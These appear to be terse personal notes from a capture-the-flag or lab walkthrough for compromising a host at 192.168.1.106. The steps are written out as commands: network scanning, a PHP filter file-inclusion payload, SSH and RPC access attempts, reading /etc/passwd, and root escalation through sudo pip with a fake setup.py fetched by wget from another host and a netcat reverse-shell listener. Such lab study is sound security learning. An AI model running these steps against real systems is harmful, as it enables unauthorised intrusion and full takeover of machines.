-to discover all the systems on the same network use
-netdiscover -i eth0
-use security scanner
-command (namp -sS -sV -O -A 192.168.1.106)
-target IP
-if RPC is open use rpcclient to generate a null session
-rpcclient -U "" 192.168.1.106
-for this we need a password
-use dirb to scan the  web content to get hidden links by bruteforce
-dirb http://192.168.1.106

-check the source html code to discover commented or hidden links to get the file
-it might be possible that some kind of base 64 file is included in the webpage now to get the file is a challenge
-uri/?lang=php://filter/convert.base64-encode/resource=index (inplace of index use all the dirb discovered files to get the base 64 encoding of the source code. 

-if you somehow manage to get the password try to login in the open ports like ssh or rpc
-ssh root@192.168.1.106 -p 3333 (wrongly configured port)
-try the password
-if failed do this for the rpcclient
-instead of root try different username from the info gathering
-after getting access if we are in python shell we need to get out and go into real shell
-import pty
-pty.spawn("/bin/bash")
-pwd current working directory
-cat /etc/issue //get the debian version
-cat /etc/passwd

-if the files are known like flag2.txt
-than we can use command
-locate flag2.txt
-permission escalation would be required to get to the file find the files accesssible to that user we need to switch into.
-find / -user devops
-to list files use 
-ls -al /srv to get a more verboseoutput and details
-possibility check for python files that are owned by super user and may be we can write a reverse shell to it
-after that we can listen to nc
-nc -nlvp 1234
-sudo -l will give all the files that can be run with sudo permissions
-to exploit pip use FakePip github
-now to put file into target machine ssh can be used or localhost can be used
-service apache2 start
-var/www
-cd /home/devops
-wget http://192.168.1.112/setup.py
-mkdir fakepip
-mv setup.py fakepip
-cd fakepip
-nc -nvlp 443
-run the pip install
-sudo /usr/bin/pip install . --upgrade --force-reinstall
-nc is unstable use 
-ncat -lvp 443
